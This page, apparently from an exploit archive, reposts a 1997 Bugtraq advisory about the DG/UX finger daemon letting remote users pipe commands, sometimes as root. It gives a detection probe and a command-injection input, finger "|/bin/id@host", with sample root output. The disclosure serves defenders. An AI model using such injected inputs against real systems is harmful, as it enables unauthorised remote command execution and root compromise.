DG/UX in.fingerd hole
| Description: | Apparently (and amazingly) current dgux ships with a finger daemon that allows remote users to pipe commands. IE you can 'finger "|/bin/id@host'. This is made worse because many of these systems apparently run in.fingerd as root (!). |
| Author: | George Imburgia <gti@HOPI.DTCC.EDU> |
| Compromise: | remotely run arbitrary programs with UID that is running in.fingerd. Sometimes this means you can remotely become root . |
| Vulnerable Systems: | dgux, versions unknown. |
| Date: | 11 August 1997 |
| Notes: | If this is true it is rather pathetic! |
Date: Mon, 11 Aug 1997 12:32:38 -0400
From: George Imburgia <gti@HOPI.DTCC.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: dgux in.fingerd vulnerability
Another old bug that won't die.
The finger daemon that ships with dgux will allow a remote user to pipe
commands, often with uid root or bin.
To check for this vulnerability, simply use the RFC compliant syntax;
finger /W@host
If it returns something like this, it may be vulnerable;
Login name: /W In real life: ???
To see the uid in.fingerd is running as, try this;
finger "|/bin/id@host"
Often, you will see something like this;
uid=0(root) gid=0(root)
or;
uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= George Imburgia =
= Network Specialist, Computer Services =
= Office of the President =
= Delaware Tech =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
